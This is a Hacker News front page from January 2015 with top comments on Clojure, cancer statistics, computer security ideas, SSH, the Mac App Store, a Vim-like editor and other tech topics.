hacker news with inline top comments    .. more ..    2 Jan 2015 News
home   ask   best   4 years ago   
Clojure 2014 Year in Review
152 points by fogus  5 hours ago   35 comments top 11
zeroDivisible 3 hours ago 1 reply      
For everybody who wants to start Clojure, I know that there are loads of good resources, but the best one which I had found is this online MOOC:


Teaches you TDD in Clojure and "forces" you to use git / Github / Travis to test your code.

Highly recommended.

edit: style.

dominotw 55 minutes ago 1 reply      
I am not sure I would use RedMonk Index as popularity measure.

Most people who I see using clojure are bored ruby programmers and they bought their open source culture with them to clojure.

Clojure is not even in top 50 on TIOBE indexhttp://www.tiobe.com/index.php/content/paperinfo/tpci/index....

mikerichards 55 minutes ago 3 replies      
Are we beginning to see the tipping point where mainstream corporates are starting to question whether traditional OO is the right way to go?

Not to start a flame war, but it seems that Clojure/Rich's strong anti-OO stance is almost a selling point of the language.

IMHO, OO just put some lipstick on the procedural pig.

jeremiep 4 hours ago 2 replies      
This is great! Glad to see more Clojure adoption in the corporate world. It's definitely well deserved!

I used it only once at work to develop a stress test for a Java based game server. It was great fun to build, worked like a charm and ended up taking less than a thousand lines of code to implement the communications, bots and their execution scripts.

Furthermore, the company just bought a copy of The Joy of Clojure and there's already a bunch of my coworkers interested in reading it. Good times!

thom 33 minutes ago 0 replies      
Are people finding it easy/easier to fill clojure positions?
JBiserkov 3 hours ago 1 reply      
Microsoft/Nokia is using Clojure to power the web services behind MixRadio.
dmix 1 hour ago 0 replies      
Not mentioned in the article but most interesting to me this year is how these guys are "building a bank from scratch in Brazil with Datomic and Clojure": https://www.youtube.com/watch?v=7lm3K8zVOdY

The future looks bright for the language, especially with applications like this.

mikerichards 1 hour ago 0 replies      
The amount of traction that Clojure is getting in companies like Walmart, Amazon, and elsewhere is surprising and impressive.

Great work Clojure community.

coding4all 1 hour ago 1 reply      
I've been writing Clojure almost exclusively for 3 or 4 years and it's just amazing. Core.async, Quil, Om, Chestnut, ClojureScript, ClojureScript + Apache Cordova, and I could go on forever.
davexunit 1 hour ago 2 replies      
Since Clojure adoption is picking up, what about convincing management to use other Lisps now? Clojure is okay, but I much prefer Scheme (Guile, Racket, Chicken, etc.).
147 2 hours ago 1 reply      
I'd like to add that I'm starting a Clojure job next Monday at a "boring" company that you would never think would have a heavy reliance on Clojure. I think that there's a demand for Clojure developers that is unmet. I keep getting recruiters and etc. messaging me about Clojure.
Bad luck, bad journalism and cancer rates
97 points by auton1  4 hours ago   29 comments top 6
MisterMashable 1 minute ago 0 replies      
Whatever the official cause of cancer it will never be food additives, processed or poor quality foods, prescription drugs, air pollution, contaminants in the water supply, contaminated vaccines (I'm a believer in vaccines so don't go there!), new car smells, pesticide residues in food and clothing, fire retardant chemicals, xenoestrogens, secondary cancers caused by chemotherapy or radiation... it will just be bad luck.
therealdrag0 12 minutes ago 0 replies      
I want to reiterate the articles recommendation of the book "Bad Science" by Ben Goldacre [0]. I learned a lot from it and found it enjoyable--and it's available in Audiobook form.

[0] http://smile.amazon.com/Bad-Science-Quacks-Pharma-Flacks/dp/...

toufka 2 hours ago 3 replies      
Here's the deal - we know it's 'chance' (not really luck) which part of your DNA is damaged by any given environmental effect. However, some DNA is more important than others. In general, a little damage is not a problem and is easily 'taken care of' by the cell which caries that DNA - either by literally repairing the DNA, silencing that DNA's function, killing itself, or asking other cells to help kill it.

We know quite clearly that cancer is (generally) caused by a set of mutations - not necessarily in an order, but some orders are not successful. There are four or five genes which keep social order amongst the other genes. If you silence all of these, you get cancer. Chance has it's role in the roll of dice for which DNA gets damaged, but all the other parameters can be changed too - how many sided the dice are, how often the dice get rolled, and whether all the cells in the same tissue have correlated dice-rolls.

Cells that deviate from what they're supposed to do are either (in order), repaired, silenced, voluntarily commit suicide, or are killed. There are proteins (genes) that are the final judges for each of these processes - and have 'go, no-go' power. Only if all of these judges are killed do you get a cell that can do anything it wants - like replicate uncontrollably to the detriment of the host ('cancer'). Thus the statistics of getting cancer roughly follow the idea that you have to get random DNA modifications of those exact 5 genes, in a single cell. Lots of things can increase your random modification rate (UV, smoke, radiation, etc). Some of these things correlate though - and again, what hurts one cell, might hurt its neighbor just as bad. They're not entirely independent events. For example, losing your DNA repair machinery (this is what HPV does - it silences your DNA repair machinery) amps up the baseline mutation rate and makes further mutations more likely (dependent correlations then arise).

The Brca gene that has caused so much controversy in patent law (whether a test for its existence could be patented) and indicates whether a person might or might be susceptible to breast cancer, is the master repair technician of the cell. In people who have this gene in working order, the Brca gene signs off on whether the cell is in need of repair. But if the Brca is not it working order, cells that are in need of repair might not get it, and instead are allowed to more freely operate under non-optimal internal conditions. If you are missing or have a mutated version of Brca, you are missing one of the checkpoint processes.

So again, we quite clearly know of a handful of genes which do most of the master regulation of a cell's job - and if these jobs go unfulfilled - by having their blueprints be damaged by the environment - you have fewer and fewer mechanisms to prevent that single cell from runaway growth.

ekianjo 1 hour ago 5 replies      
Wait, is this an article from the Guardian making fun of their own article on the same study earlier on ? See http://www.theguardian.com/society/2015/jan/01/two-thirds-ca... ? If that's the case, that's a novel way of doing journalism: publish crap first, then sell more paper by doing a critique of your crap.
termostaatti 54 minutes ago 1 reply      
Naturally the way one lives has an impact whether potentially he/she will get cancer. Smoking, drinking, eating certain types of food (manufactured wrong) etc. all have direct relation on cancer. It's never just luck who happens to get these horrible diseases.
Baseline Mac OS X Support merged into FreeBSD package manager
25 points by emaste  47 minutes ago   7 comments top 2
aduitsis 4 minutes ago 0 replies      
This is great news. Pkgng is very easy to use and achieves a very good combination of binary packages and the FreeBSD ports tree when you want to compile stuff yourself. Which happens more often than expected admittedly.
santaclaus 16 minutes ago 3 replies      
Interesting! What is the advantage of the FreeBSD package manager over existing OS X package managers like Homebrew or MacPorts?
What Will the World Speak in 2115?
16 points by prostoalex  1 hour ago   12 comments top 5
natrius 9 minutes ago 0 replies      
I don't know how people will communicate in 2115, but I can't imagine a 2115 where every human doesn't know every language without any effort at all. How can a discussion of life that far in the future not mention how computers will shape it?
eddielee6 36 minutes ago 3 replies      
Prediction: Everyone speaks in JavaScript
sbmassey 15 minutes ago 0 replies      
I don't think the loss of a language without a literature is much of a loss, really.

Also Navajo, though grammatically odd to speakers of Indo-European languages, doesn't seem to consist of all irregular verbs as the article suggests.

walterbell 23 minutes ago 0 replies      
No mention of cross-language icons, signs and emoji?
rokhayakebe 38 minutes ago 3 replies      
I have a different opinion. I think people will stick to their languages, and some will die naturally.

However, one new language will emerge. It will be a set of 500 to 1000 words that anyone can learn and use to communicate world wide.

Similarly to a programming language, this one will be limited in words and easy to pick up. This language will act as a framework, giving the essential people would need to have basic communication. 500 to 1000 words.

Clojure at a Newspaper
15 points by tim333  1 hour ago   2 comments top 2
untog 6 minutes ago 0 replies      
Not to talk down Clojure, but it sounds like the real success here was being able to reinvent existing systems, and having a CTO willing to give you the space to do it.

After all, the majority of sites like this are getting data from <data store>, squeezing through <template> and delivering to the user's browser. The language you do that in will have a much smaller effect than, say, your caching strategy (particularly at a high volume site like MailOnline).

taylorlapeyre 32 minutes ago 0 replies      
Great language, great community. Glad to see its adoption spreading.
Dumb Ideas in Computer Security (2005)
63 points by corv  3 hours ago   26 comments top 10
lmm 2 hours ago 1 reply      
Not the dumbest by any means.

What this idea seems to miss is that most of the value created in computing - not just among professional software developers but also among ordinary users - comes when people do things that the creators hadn't thought of. You could run every program in its own isolated space where it can only touch its own stuff, and this would eliminate a lot of vulnerabilities (we see this today on mobile). But as soon as you want to script your image resizes based on a spreadsheet or whatever, that model breaks down (or else you end up with everything tunneled over the few approved vectors; iphone users dropbox files just so that they can open them on the same phone in a different program). And worse, users end up utterly beholden to the few entities with "real" access.

It's very easy to create a secure computer, by turning it off. But that doesn't help anyone. In the long run, the cure of deny-by-default is worse than the disease.

justsomedood 1 hour ago 2 replies      
I really don't understand how "3) Penetrate and Patch" is a bad idea. The argument is:

> Your software and systems should be secure by design and should have been designed with flaw-handling in mind

I'm not sure I would argue that systems that have been hacked were intentionally insecure by design, but that the developers thought it was secure by design but they were just wrong. It seems totally unrealistic to say "just make it secure instead" as the solution, especially when machines are connected to the outside world.

michaelt 2 hours ago 2 replies      

  The most recognizable form in which the "Default Permit"  dumb idea manifests itself is in firewall rules. [...]   The opposite of "Default Permit" is "Default Deny" and   it is a really good idea.
And now you know why everything from version control systems to video conferencing software tunnel things over HTTP!

sharpneli 1 hour ago 0 replies      
#1 I've never understood this as a concept. Why on earth would you first run an FTP server and then block the port it uses?

Sure it helps if someone sneakily installs stuff but that's the reason why so many things are nowadays tunneled via HTTP. Because everything is always blocked.

The point about load balancer whitelisting was a good one.

#2 works only if you choose iOS style environment where a single entity, Apple in that case, decides what to run and what not to run.

Otherwise it falls to the "Cute rabbit" category. E.g: If user gets a mail "Click here to see a cute rabbit!" they will click everything, bypass all security dialogs just so they can see the cute rabbit. And/or they will grow desensitised and click "Yes" on all dialogs. The old UAC dialog in Windows Vista was an excellent example of this. Everyone just automatically clicked yes because it popped up all the time.

#3 is just "Don't write buggy software". Yeah. We wouldn't if we were smart enough.

iokevins 3 hours ago 4 replies      
It seems the author originally published this in 2005; reaching the bottom: "Morrisdale, PA Sept 1, 2005." On the linking page, http://www.ranum.com/security/computer_security/index.html, it states, "(originally written for certifiedsecuritypro.com)."

Might the submitter have meant to make a point about the predictions made by the author, ten years ago? For example, "My prediction is that the "Hacking is Cool" dumb idea will be a dead idea in the next 10 years."

gpcz 2 hours ago 2 replies      
I read this article a few years ago and thoroughly enjoyed it, but I've had trouble solving Default Permit in practice. Does anyone know of a free software operating system that white-lists its software (say by having the white-list be tied to the package manager) without having to do a lot of tinkering/configuring? I know you can do it with certain Linux add-ons that provide mandatory access control like SELinux and grsecurity, but it always seems like they introduce problems that you then have to troubleshoot for hours before your system is usable again. Bonus points for if this distro uses ASLR, W^X, and other countermeasures to avoid violating the security policy through code injection.
ademarre 31 minutes ago 1 reply      
An example of what he calls "Enumerating Badness" and "Default Permit" is seen today in web application firewalls (WAFs) that try to block XSS payloads. It conceals the real problem, which is a vulnerability in the web app itself, and it's a tall order to expect the WAF to capture 100% of XSS payloads.
shalmanese 6 minutes ago 0 replies      
It's actually quite easy to make a business that is absolutely secure. You simply turn off all of your computers, fire all of your employees, sell off all your assets and empty your bank accounts. There, now you have a business that's absolutely unhackable.

What this hopefully demonstrates is that security is never the final goal, it's always a proximate goal and will always exist in tension with other goals.

Default Permit: We've all heard stories about dumb corporations where programmers couldn't even install a compiler without filling in a form and waiting a month. Default Deny kills productivity in a workplace because of the 80/20 rule. It's very easy to whitelist the 20% of apps that account for 80% of the usage but nigh impossible to whitelist the 80% of apps that are specific and niche. There was a post a few days ago about some guy working for immigration who figured out how to automate his job with UI scripting. That would have never happened under a Default Deny workplace.

Enumerating Badness: Like he said, this is a specialized version of Default Permit and all the same criticisms apply.

Penetrate and Patch: Building software that is architecturally secure is hard because it often imposes global constraints against your code. Global constraints get harder to implement as you start distributing your team in space and time and as you need to adapt code to changing requirements. Penetrate and Patch works because it allows you to deliver code quicker which is overwhelmingly more important than delivering secure code.

Hacking is cool: That he brings up spammers instantly undermines this argument since there's nothing less cool than spammers, yet spam has grown as fast if not faster than hacking over time. The threat vectors most of concern to companies nowadays are from nation states, organized crime and economic extortionists who could care less how "cool" their job.

Educating users: I remember when GMail started stripping out .exes from emails so we would start sending exes inside of zips. Then GMail started inspecting .zip files so we would change the file extension to .zip2. Then Google started detecting ZIP signatures so we started sending encrypted zip files just so we could email exes to each other. Why? Because emailing exes turned out to be a really, really useful thing to do. Any kind of paternalistic security policy inevitably ends up damaging more productive work than it does protecting against threats.

Action is better than inaction: Tell that to all of the industries that have been disrupted because they didn't stay sufficiently on top of trends. There are pros and cons to being an early adopter vs a late adopter but one is not universally better than the other.

The main point through all of this is that when bad security practices are widespread, it's usually because it's in conflict with some other business goal and there are rational reasons why security lost out. There aren't many silver bullet fixes because if there were, they would have been deployed already.

ThrustVectoring 2 hours ago 0 replies      
>Wouldn't it be more sensible to learn how to design security systems that are hack-proof than to learn how to identify security systems that are dumb?

Part of the way you design hack-proof security systems is by identifying the dumb ways of doing things and then not doing them.

squozzer 2 hours ago 1 reply      
Pretty good ideas, but transition fom current-state to the author's ideas will bring a lot of pain.

#1 - Default Permit - if aliens arrived and hacked all of our systems to enforce "default deny" - we'd all die within a week. Nothing would work. Game over, civilization. Ask the author if he'd sanction a "default deny" switchover on the systems that control his mom's respirator.

If that sounds like an indictment of status quo, you're right. But how do you handle a skid? Not by turning the wheel full lock in the opposite direction, certainly.

Hard to argue with #2 or #3 but of course alternatives depend greatly on the availability of talent, of which there is precious little. Just getting things to work requires most of our bandwidth.

Now, if I ruled the IT world, my devs would be ex-chemical engineers (a profession that seems adept at understanding dynamic processes) who have world-class comprehension of every layer of my tech stack AND who were provided with unlimited budgets and time, with proper prototyping and other great engineering practices.

#4 - Hacking is cool if in service of a noble goal, just as murder is when fighting an aggressive enemy or burglary is when it uncovers something nefarious. But otherwise, it's just plain B&E.

#5 - Educating users. I think we have another transition issue on our hands - most of today's users are clueless, sure. But tomorrow's will only be on guard against what works today. Maybe the author thinks everyone over a certain age is obsolete, or that only security people know what's best for users. In either case, let's hope the author doesn't attempt to fit their template onto other aspects of society.

#6 - Assuming the author is right, if everyone adopts a wait-and-see approach, who will act as the early adopters whose brains one can pick? Certainly IT has a lot of gratuitous product / idea churn, and cluelessness seems to prevail in a lot of decisions, but I doubt fastidious conservatism will fare any better.

Lizard Squad attacks Brian Krebs
38 points by MarcScott  2 hours ago   13 comments top 6
Buge 42 minutes ago 0 replies      
In the past he's also been swatted and had drugs mailed to him, and a flower cross saying RIP Brian Krebs.
freshyill 1 hour ago 0 replies      
The article says they knocked him offline only briefly, but I'm actually having trouble loading krebsonsecurity.com right now.
codyb 1 hour ago 3 replies      
I wonder how he tracks them down? And if he can find two so easily (on his own?) how had they not be outed already?
justizin 13 minutes ago 0 replies      
yawn, brian krebs is like the tom clancy of internet security
sroerick 39 minutes ago 0 replies      
Hah, why does CNN have a "Happy Birthday Playstation" message on this page?
ExpiredLink 27 minutes ago 1 reply      
> Lizard Squad ruined Christmas for people around the world

Come on!

Stingrays Go Mainstream: 2014 in Review
35 points by fearfulsymmetry  2 hours ago   2 comments top 2
guelo 24 minutes ago 0 replies      
In the balance between police secrecy of "sources and methods" and government transparency we need to lean heavily towards transparency because preserving democracy is more important than fighting crime.

As technology advances these issues are going to get creepier and scarier and as a society we need to have open debates about the powers that we're willing to grant governments.

Every new crime fighting technology needs to be vetted by the public before police get access to them.

dang 1 hour ago 0 replies      
Nepal Standard Time
17 points by gkop  4 hours ago   11 comments top 5
jtokoph 2 minutes ago 0 replies      
Tom Scott has a wonderful video walking through the overwhelming complexity of timezones: https://www.youtube.com/watch?v=-5wpm-gesOY
annapurna 49 minutes ago 0 replies      
"[It] was not till 1956 that [Nepal] set [their] watches for the first time to Nepal Standard Time, with the meridian at Mt Gauri Shankar, 100km east of Kathmandu [capital of Nepal]. It wasn't Mt Everest because Gauri Shankar was closer to Nepal's centre of gravity, as it were.

It was a choice that set [Nepal's] clocks 10 minutes ahead of India, which at the time used the longitude that passed through Calcutta. When [India] switched their meridian to Hyderabad in 1971, [Nepal] officially had four degrees of separation, and presto, found ourselves a further five minutes ahead of the Indians."


ArtDev 28 minutes ago 0 replies      
In Nepal the year is 2071 (http://en.wikipedia.org/wiki/Nepali_calendar)

It is an amazing country. Nepal is the "roof of the world".

nnain 4 hours ago 1 reply      
It's pretty weird indeed. Think of the misery of a traveler from/to Nepal who has to do the extra mental math every time to figure out the time for another place.

They could have settled for an easier time, considering the country stretches over quite a few longitudes. Don't know what was the logic here!

mshakya 43 minutes ago 1 reply      
So does this mean that NST uses distance between indian meridian and Mt. Gauri to set the NST?
Design of a Vim-like text editor
152 points by ProfDreamer  9 hours ago   57 comments top 17
faragon 2 minutes ago 0 replies      
The source code of vis looks great, and the executable takes about 100KiB (x86-64). The editor does not behaves exactly like vi/vim, but it is quite acceptable.

I like a lot suckless manifesto, recommended projects, etc. http://suckless.org/

_b 2 hours ago 0 replies      
Right now, using vim is better than using this new editor (vis), although vis is close to being substantially better than vim.

I use the suckless window manager (dwm) and terminal (st), so gave vis a try for a couple days. Three vim plugins made me return: git-gutters, you-complete-me (ycm), and clang-format.

It is hard to extend vim's functionality. Its plugin interface has issues. Because of that, ycm and git-gutters can not be used at the same time, and something that ought to be straightforward like exposing clang's autocomplete information requires a considerable engineering effort (ycm) spanning three languages and about as much code as vis is total.

Giving vis good extensibility would be easier than fixed vim's plugin interface (sorry neovim). My personal preference for doing this would be a patch to vis that adds vim like gutters and dropdowns, and then patches that require this one and add specific things like ycm and git-gutters. A reasonable programmer could disagree and prefer out-of-process plugins. Either approach being implemented well would be very exciting.

gchp 2 hours ago 1 reply      
I'm currently building a similar project in Rust called iota: https://github.com/gchp/iota

I don't intend it to be a vim clone, however I'm currently adding some features which I've borrowed from vim. The main one being modal editing. Its much earlier on than this project, though.

As a side note, building a text editor is great fun, one of the most interesting projects I've worked on!

Myk267 3 hours ago 0 replies      
I'm always interested in the suckless projects. I like emacs and vim, too, but it's interesting to see projects made which can just grab the fork, a sharp knife, and a good pan and make do instead of necessarily including the kitchen sink, if I may get the analogies out.

Also, no tests? Phew!

mikejholly 4 hours ago 1 reply      
So weird to see this at #1 since I was researching this exact topic last night. My idea is a fully scriptable (Racket or CL) editor with modern package management system. A tiny C core would handle rendering (curses, etc.). Very cool write up though!
ryandvm 7 hours ago 1 reply      
I've been using Vim for over a decade. I love it. But I feel more and more anachronistic every time I have to hunt down some Vim plug-in for whatever IDE I'm setting up.

I'd love to see a fresh take on hyper-efficient text editing in modern GUI environments.

spain 5 hours ago 5 replies      
How about an embedded Lisp interpreter?
rejschaap 4 hours ago 1 reply      
Obviously, I don't know what the author personally experienced. But since this is on the suckless mailing list, reading their philosophy[0] is probably a good starting point.

[0] http://suckless.org/philosophy

shurcooL 2 hours ago 1 reply      
That was a very interesting read. I might want to implement some of those things in my text editing component.

I have one question. How would they implement "go to line number" functionality? How fast would it be?

oneeyedpigeon 3 hours ago 2 replies      
How do I submit a patch? Needs a couple of tiny mods to compile on OSX.
0xdeadbeefbabe 1 hour ago 0 replies      
You don't have to use posix to suck less you know, or do you?
flavioribeiro 6 hours ago 2 replies      
Great idea! I wonder why you aren't using github (or bitbucket, etc) for hosting the project. I personally think that early projects can benefit from tools like that, since people can follow the progress (issues, bugfixes, etc) and access the code without cloning the repo.
marktangotango 8 hours ago 0 replies      
Very interesting. I also found quiet a lot of inspiration from reading about the Oberon system. This author was inspired by the text editor, I was more interested in the language. The author uses 'peice chains' as opposed to a gap buffer which was new to me.

I'm sure many will say, why another editor? I say why not? Looks like a fun project.

oscargrouch 4 hours ago 0 replies      
Instructions to compile the source on Freebsd:

in config.mk, change the line :




The flags (the removed ones), trigger the "__BSD_VISIBLE 0" macro that makes the signal "SIGWINCH" unavailable, as they are used in vis.c

PythonicAlpha 4 hours ago 0 replies      
I would like to have a vim-clone, that also can handle embedded images.

Just a wish.

ExpiredLink 5 hours ago 2 replies      
Most of the "main goals" are supported by ... Eclipse!
amelius 7 hours ago 3 replies      
Why not write a rich-text editor instead?Or a webbrowser?

Seriously. They seem like more interesting endeavours to me.Especially if you document every step of the way.In fact, you could write a book about it.

Complications in Physics Lend Support to Multiverse Hypothesis
33 points by ghosh  3 hours ago   27 comments top 9
Steuard 2 hours ago 1 reply      
I used to believe that the history of physics gave unwavering evidence that there is always a deep reason for the patterns and phenomena we observe: maybe not for the specifics of everyday life, but certainly for fundamental facts. (Think of how atomic theory made sense of the elements, or how nuclear physics explained how the sun could shine for so long, or how the unification of electricity and magnetism miraculously turned out to explain optics as well.) So I was convinced that we would someday find a fundamental theory that would be able to predict things like the fine structure constant or the charge to mass ratio of the electron.

But eventually someone pointed out that before we understood the history and nature of the solar system, natural philosophers looked for similarly deep explanations for the orbits of the planets. Kepler once proposed a deep connection between the (five) gaps between the six known planets and the five platonic solids (see, e.g. http://www.pbs.org/wgbh/nova/blogs/physics/2011/12/beautiful...), and Bode's law for planetary orbits was widely accepted until Neptune was discovered in the "wrong" place in 1846 (see http://en.wikipedia.org/wiki/Titius%E2%80%93Bode_law).

Today, we understand that there is no reason to expect any particular pattern of planetary orbits: solar systems are a dime a dozen in the galaxy, and their details are accidents of history. So while I don't like the idea, I've gradually come to accept that the "fundamental physical constants" of our universe could conceivably turn out to be just as arbitrary as the ratio of Jupiter's major orbital axis to Saturn's.

kghose 2 hours ago 2 replies      

I can find nothing unnatural about the existence of a single universe with particular constants that give rise to life that then studies the universe. There is nothing in this that leads inevitably to the conclusion someone has been rolling the dice many times until this came about.

Animats 3 hours ago 2 replies      
The cosmology end of physics is kind of stuck right now. Many-worlds and the anthropic principle are back again. What they're theorizing about has way too much stuff that can't be observed or tested experimentally. Some people question whether this is even science.

"Science is prediction, not explanation." - Fred Hoyle.

TrainedMonkey 2 hours ago 0 replies      
We developed highly accurate instruments that measure incredibly small and large things. Yet all of our scientific progress is biased, because we have evolved in a very specific environment that we handle well. Virtually all of our scientific measurements had been done in a relatively small time frame[1] and on one very specific planet with certain conditions [2].

I think it is way to early to call universe unnatural. Sure there is a chance that it might be true, but we are not going to find out until we have way more data. For one there is so much in cosmology that we cannot explain yet, such as dark matter and accelerating expansion.

[1] Last 250 years or so.

[2] Gravity, magnetic field, stable trajectory around the sun (sun's gravity is more or less unchanging)... I do know there are variations and experiments in microgravity, but all high-energy particle acceleration experiments had been done in relatively same conditions.

elberto34 2 hours ago 0 replies      
End of science? Hardly. just because we may be in a multiverse doesn't mean we should stop trying to figure out how our particular universe works, and this info may yield insight into the other universes. There is still so much to learn
ccvannorman 3 hours ago 0 replies      
The deeper we go, the stranger things get. But I doubt scientists will "lose the desire to continue looking for new physics" as is warned by this article! We'll go deeper and things will get stranger, and that's just the way of human exploration.
gregonicus 2 hours ago 1 reply      
"Parallel universes cannot be tested for"The multiverse idea just sounds like a more respectable version of "turtles all the way down"
trhway 2 hours ago 0 replies      
>Physicists reason that if the universe is unnatural, with extremely unlikely fundamental constants that make life possible, then an enormous number of universes must exist for our improbable case to have been realized.

somewhat reminds about what physics must have been before Newton's laws - the cannon ball flies this strange seemingly unnatural trajectory what it would sound reasonable to suppose that "enormous number of universes must exist for our improbable case to have been realized."Though they were lucky back then to have God's will as an easy always available tool for explanation. We're not that lucky today. We have to continue digging :)

kazinator 43 minutes ago 1 reply      
The thing is, nothing you can discover in physics can refute the multiverse hypothesis. It is not falsifiable in that way.

Even if you find that you're in a very special universe, you need an explanation of why it is that way. The multiverse hypothesis helps, by giving a plausible answer which avoids belief in gods.

Benefits of Selling Outside the Mac App Store
51 points by milen  5 hours ago   16 comments top 5
tomkinstinch 2 hours ago 1 reply      
Another point to add is that applications sold outside the App Store can avoid the sandboxing restrictions of the Store, and consequently contain functionality that would be not permitted by Apple on the Store (file access, deeper system access, etc.).

That said, for my side project ( http://artfulmac.com ) it is absolutely worth it to me as a solo developer to pay Apple their 30% to have them handle fulfillment (including system-integrated update notifications), payment processing (with currency conversion), tax form creation, and refunds. It's a trade of financial overhead for time. The App Store also conveys a sense of trust to consumers.

lnanek2 48 minutes ago 0 replies      
I think it is misleading to have a big picture of an iPhone at the top, and talk extensively about selling outside the app store, when that isn't a realistic option for iOS smartphone developers. You are forced to use the App Store for iPhone since the number of jail broken devices that can install other apps is too low. The author must be talking about Mac laptop/desktop apps.
pavlov 2 hours ago 2 replies      
The Mac App Store is a ghetto. It's completely neglected by Apple. I'm not sure who they imagine to be the target audience -- maybe it works for mobile-style game experiences, I wouldn't know, but it's certainly no good for professional apps.

Important issues with sandboxing were never resolved. Meanwhile existing APIs keep being moved to the restricted list, so as a developer you can't even count on your product being able to stay on the Mac App Store.

nathanbarry 3 hours ago 1 reply      
Really solid article. I love that it includes actual numbers.

"Apple has taken $600,000 (USD) of that in fees. Ouch!" is much more concrete than just "30% of revenue."

programminggeek 1 hour ago 0 replies      
I tend to think of selling to an app store as basically selling through Wal-Mart or Best Buy vs selling direct. Yes, selling direct is higher margin, but it's also got a different set of challenges. For example, you have to acquire customers on your own.

Probably the best way to look at it would be to treat the Mac App Store as a secondary channel. If it was a secondary sales channel, then it's additional revenue and new customers which is a nice to have.

You are probably best off creating your own customer list and selling directly to customers over time away from the Mac App store. Or, you avoid it alltogether and figure out how to sell direct. The only downside there is you have to do your own advertising and use something like Gumroad or FastSpring or some homegrown Stripe solution for delivery and such.

Nothing is perfect and there are tradeoffs to both approaches.

GitHub's hub tool rewritten in Golang
62 points by akerl_  2 hours ago   41 comments top 6
shawnps 2 hours ago 2 replies      
Reasoning behind porting it to Go: https://github.com/github/hub/issues/475

"My Ruby implementation of context.rb is getting unwieldy and in hub v1.11 I feel I've reached the limit of how much I can speed up hub exection. I can't make it much faster than 50 ms due to Ruby interpreter slowness. Go port can execute in under 10 ms, and it's not even specially optimized yet. Go port can also be distributed as a pre-compiled binary, skipping the need to install Ruby, which can be especially tricky and error-prone for Windows users."

bdcravens 4 minutes ago 0 replies      
Not uncommon. Cloud 66, a platform for hosting Rails apps, rewrote their toolchain in Go after it was originally written in Ruby.


Mike Perham, of Sidekiq fame, built his latest product in Go. Ditto for Mitchell Hashimoto: Vagrant is one of the most popular Ruby products out there, but most of the other tools his company builds are written in Go.

aikah 1 hour ago 1 reply      
Afaik it was previously in ruby right? I need to check out the source code ,that's definitely an interesting project.

any windows build out there?

bentoner 37 minutes ago 0 replies      
Is there anything like this for gitlab?
taybin 2 hours ago 2 replies      
Isn't it more lines of code now?
karissa 2 hours ago 10 replies      
Why was this necessary? Since hub is a distributed tool, users will now have to download Go on my local machine. Pretty big dependency, if you ask me.
Ancient Amulet Discovered with Curious Palindrome Inscription
20 points by Thevet  5 hours ago   discuss
Why arent we using SSH for everything?
83 points by dkua  1 hour ago   34 comments top 9
ivan_ah 1 minute ago 0 replies      
Isn't there a problem when you tunnel TCP over TCP with increasing window sizes (auto throttling mechanism meant to prevent packet fragmentation)?

Every time I've tried to keep a long-running ssh tunnel for printing / http, the connection degrades after a while. I'm sure there are some flags that can be set, but I thought this was the major show stopper for the "everything over shh" (since ssh uses TCP protocol)

falcolas 1 hour ago 1 reply      
Neat trick, if you're so inclined to use such tricks:

    $ cat .ssh/authorized_keys    command="tmux new-session -A -s base" ssh-rsa [...]
Automatically creates or joins a tmux session named base, and disconnects the SSH session when you disconnect from the tmux session.

So, yeah, why don't we use SSH for more?

forgottenpass 1 hour ago 1 reply      
Why arent we using SSH for everything?

Because "Use X for everything" is a terrible design decision? SSH uses flexible transport with some desirable features and may be underutilized in practice.

This question is starting to feel like people who want to staple every pie in the sky idea to the bitcoin blockchain because it too has a set of desirable properties.

josephg 23 minutes ago 5 replies      
Because SSH requires several seconds to initiate a session, even on a local LAN.

Does anyone know why this is the case? Its always baffled me.

sharpneli 10 minutes ago 0 replies      
SSH can really be used for almost everything.

My favourite one: http://en.wikipedia.org/wiki/SSHFS

Whenever I'm developing for my mobile phone I actually have the contents mounted on my desktop via sshfs as an actual filesystem.

forfengeligfaen 1 hour ago 4 replies      
If you believe Jacob Appelbaum, we probably should not be using SSH for anything http://media.ccc.de/browse/congress/2014/31c3_-_6258_-_en_-_...
feld 1 hour ago 2 replies      
I wonder if his chat server has been hit by a botnet yet trying to ssh in and then sending tons of shell commands
shazow 1 hour ago 0 replies      
Sorry the title has been revised to "Why arent we using SSH for everything?" in case mods see this.
higherpurpose 1 hour ago 5 replies      
I read somewhere that SSH can be MITM'ed by a global adversary on the first visit (before it establishes the secure connection). Is that true?
Hyperfox HTTP/HTTPS proxy with dynamic SSL cert generation in Go
35 points by kylequest  5 hours ago   2 comments top
kylequest 3 hours ago 1 reply      
Nothing fancy, but still nice :-)

goproxy (https://github.com/elazarl/goproxy) has even more...

A Bibliographic Miracle
9 points by benbreen  3 hours ago   2 comments top 2
mrec 3 minutes ago 0 replies      
Why scramble the title? The article has "Bibliophilic", not "Bibliographic"; I was curious to see whether people really get that excited about a good list of references.
walterbell 14 minutes ago 0 replies      
> "Charles Ralph Boxer was born in 1904 to a distinguished British family of considerable means... His scholarship, both specialist and interdisciplinary, was gained by research and reading - he owned a library of institutional proportions - as well as by experience in his extensive travels.

How many future scholars will be educated by comparable books at the free and larger-than-institutional archive.org and international variants? No longer does one need to be born into a "family of considerable means" to gain the scholarly skills that come from curiosity and access to a quality library.

New Science on Building Great Teams
45 points by jeremynixon  7 hours ago   14 comments top 5
Fede_V 2 hours ago 1 reply      
Reading articles in that format drives me crazy. For example:

"For example, we now know that 35% of the variation in a teams performance can be accounted for simply by the number of face-to-face exchanges among team members"

Can I get a reference to a scientific paper that measures this or where this result is discussed? Off the top of my head - this depends hugely on the task at hand. Certain tasks require constant nonstop communication and updates - other tasks are more modular and the communication sweet spot is different. Even within the same task, different phases of the task require different amounts of communication - when you are whiteboarding the design of a particular library, constant feedback is exceptionally useful. When it's time to sit down and write difficult code involving pointer math, constantly discussing things will just throw you off.

I am sure there was some proper science done behind that number - but that number refers to teams of a certain size, working on a specific task, in a given context (I would also be curious to know the C.I. on that 35% too). Trying to draw a nice narrative with a simple message from a narrow experiment is basically everything that I dislike about this Gladwellesque style pop science.

Reading narratives like this gives a completely unwarranted sense of confidence into something which we still understand very, very little about.

adunn 3 hours ago 1 reply      
"For example, we now know that 35% of the variation in a teams performance can be accounted for simply by the number of face-to-face exchanges among team members."

As someone who lives in a rural area I see a distributed team as the way to go for hiring talented individuals. I also know that working remotely can hurt communication and collaboration if extra effort is not given. It would be interesting to see a similar study on distributed teams and a comparison of how effective their different strategies and communication tools are. Do any remote workers here have any observational evidence on this?

dpritchett 4 hours ago 1 reply      
As much as I like the scientific method in most other aspects of life, Taylorism has always terrified me.
